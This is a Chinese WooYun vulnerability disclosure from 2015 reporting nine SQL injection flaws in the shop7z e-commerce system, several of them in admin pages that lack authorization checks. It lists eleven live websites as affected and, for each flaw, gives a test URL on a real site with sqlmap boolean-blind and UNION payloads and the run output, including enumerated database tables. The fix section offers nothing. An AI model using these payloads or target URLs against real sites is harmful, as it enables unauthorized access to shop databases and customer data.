当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0109753

漏洞标题:shop7z九处SQL注入打包

相关厂商:shop7z

漏洞作者: gobal

提交时间:2015-04-23 15:21

修复时间:2015-06-07 15:22

公开时间:2015-06-07 15:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-23: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-06-07: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

shop7z九处SQL注入打包 提交好几次了 虽然很累 不过想到审核的哥们要审核那么多洞 自己的累确实不算什么

详细说明:

案例:
http://www.gzsewing.com
http://www.125309.com
http://www.nm3g.org
http://35dianqi.com
http://www.ai04.com
http://www.longmm.net
http://www.99pwan.com
http://www.heimawg.com
http://www.hzjdpm.cn
http://ptwb.net
http://5lmm.cn
#1
漏洞文件:/admin/dingdan_sendnot.asp
问题参数:id【POST下】
TEST:http://www.125309.com/admin/dingdan_sendnot.asp

id=1


Place: POST
Parameter: id
    Type: boolean-based blind
    Title: Microsoft Access boolean-based blind - Parameter replace (original va
lue)
    Payload: id=IIF(2159=2159,1,1/0)
---
[19:37:57] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[19:37:57] [INFO] fetching tables for database: 'Microsoft_Access_masterdb'
[19:37:57] [INFO] fetching number of tables for database 'Microsoft_Access_maste
rdb'
[19:37:57] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[19:37:57] [INFO] retrieved:
[19:37:58] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[19:37:58] [WARNING] unable to retrieve the number of tables for database 'Micro
soft_Access_masterdb'
[19:37:58] [ERROR] cannot retrieve table names, back-end DBMS is Access
do you want to use common table existence check? [Y/n/q] y
[19:38:01] [INFO] checking table existence using items from 'D:\python\sqlmap\tx
t\common-tables.txt'
[19:38:01] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 9
[19:38:01] [INFO] starting 9 threads
[19:38:06] [INFO] retrieved: admin
[19:38:23] [INFO] retrieved: article
[19:40:37] [INFO] retrieved: ad
[19:41:05] [INFO] retrieved: message
Database: Microsoft_Access_masterdb
[4 tables]
+---------+
| ad      |
| admin   |
| article |
| message |
+---------+


#2
漏洞文件:/admin/lipindel.asp【存在越权】
问题参数:id
TEST:http://www.125309.com/admin/lipindel.asp?id=1

Place: GET
Parameter: id
    Type: boolean-based blind
    Title: Microsoft Access boolean-based blind - Parameter replace (original va
lue)
    Payload: id=IIF(1449=1449,1,1/0)
---
[19:46:56] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[19:46:56] [INFO] fetched data logged to text files under 'D:\python\sqlmap\outp
ut\www.125309.com'
[*] shutting down at 19:46:56


#3
漏洞文件:/show.asp?tk=shop7z
问题参数:pkid【POST下】
TEST:http://www.125309.com/show.asp?tk=shop7z

pkid=1


Place: POST
Parameter: pkid
    Type: UNION query
    Title: Generic UNION query (NULL) - 38 columns
    Payload: pkid=-2466 UNION ALL SELECT CHR(58)&CHR(120)&CHR(108)&CHR(112)&CHR(
58)&CHR(111)&CHR(71)&CHR(69)&CHR(101)&CHR(89)&CHR(81)&CHR(101)&CHR(74)&CHR(104)&
CHR(110)&CHR(58)&CHR(99)&CHR(106)&CHR(99)&CHR(58),NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM
MSysAccessObjects%00
---
[19:48:36] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[19:48:36] [INFO] fetched data logged to text files under 'D:\python\sqlmap\outp
ut\www.125309.com'
[*] shutting down at 19:48:36


#4
漏洞文件:orderpro_del.asp
问题参数:id
TEST:http://www.125309.com/orderpro_del.asp?id=1

Place: GET
Parameter: id
    Type: boolean-based blind
    Title: Microsoft Access boolean-based blind - Parameter replace (original va
lue)
    Payload: id=IIF(2623=2623,1,1/0)
---
[19:50:23] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft Access
[19:50:23] [INFO] fetched data logged to text files under 'D:\python\sqlmap\outp
ut\www.125309.com'
[*] shutting down at 19:50:23


#5
漏洞文件:show_foot.asp
问题参数:c_id
TEST:http://www.125309.com/show_foot.asp?c_id=1

Place: GET
Parameter: c_id
    Type: boolean-based blind
    Title: Microsoft Access boolean-based blind - Parameter replace (original va
lue)
    Payload: c_id=IIF(3932=3932,1,1/0)
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: c_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CHR(58)&CHR(104)&CHR(11
5)&CHR(121)&CHR(58)&CHR(115)&CHR(90)&CHR(101)&CHR(90)&CHR(89)&CHR(79)&CHR(67)&CH
R(102)&CHR(120)&CHR(119)&CHR(58)&CHR(102)&CHR(113)&CHR(107)&CHR(58),NULL,NULL,NU
LL,NULL,NULL,NULL FROM MSysAccessObjects%00
---
[19:51:54] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[19:51:55] [INFO] fetched data logged to text files under 'D:\python\sqlmap\outp
ut\www.125309.com'
[*] shutting down at 19:51:55


#6
漏洞文件:showone.asp
问题参数:l_id
TEST:http://www.125309.com/showone.asp?l_id=1

Place: GET
Parameter: l_id
    Type: boolean-based blind
    Title: Microsoft Access boolean-based blind - Parameter replace (original va
lue)
    Payload: l_id=IIF(9827=9827,1,1/0)
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: l_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CHR(58)&CHR(122)&CHR(10
2)&CHR(104)&CHR(58)&CHR(113)&CHR(87)&CHR(69)&CHR(120)&CHR(108)&CHR(79)&CHR(88)&C
HR(86)&CHR(109)&CHR(116)&CHR(58)&CHR(106)&CHR(116)&CHR(122)&CHR(58),NULL,NULL,NU
LL,NULL,NULL,NULL FROM MSysAccessObjects%00
---
[19:53:38] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[19:53:38] [INFO] fetched data logged to text files under 'D:\python\sqlmap\outp
ut\www.125309.com'
[*] shutting down at 19:53:38


#7
漏洞文件:/admin/dingdan_detail.asp【存在越权】
问题参数:id
TEST:http://www.125309.com/admin/dingdan_detail.asp?id=1

Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 9606=9606
---
[19:54:50] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[19:54:50] [INFO] fetched data logged to text files under 'D:\python\sqlmap\outp
ut\www.125309.com'
[*] shutting down at 19:54:50

漏洞证明:

#8
漏洞文件:/admin/chongzhimodify.asp【存在越权】
问题参数:id【POST下】
TEST:http://www.125309.com/admin/chongzhimodify.asp

id=1


Place: POST
Parameter: id
    Type: boolean-based blind
    Title: Microsoft Access boolean-based blind - Parameter replace (original va
lue)
    Payload: id=IIF(3785=3785,1,1/0)
---
[19:58:56] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[19:58:56] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 85 times
[19:58:56] [INFO] fetched data logged to text files under 'D:\python\sqlmap\outp
ut\www.125309.com'
[*] shutting down at 19:58:56


还有处不确定 不过应该是注入
#9
漏洞文件:/admin/zhfbili.asp【存在越权】
问题参数:zhfbili【POST下】
TEST:http://www.125309.com/admin/zhfbili.asp

zhfbili=1'&Submit=+%B1%A3%B4%E6+&ok=1


Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14'
[Microsoft][ODBC Microsoft Access Driver] 字符串的语法错误 在查询表达式 ''1''' 中。
/admin/zhfbili.asp,行 77

修复方案:

RT

版权声明:转载请注明来源 gobal@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)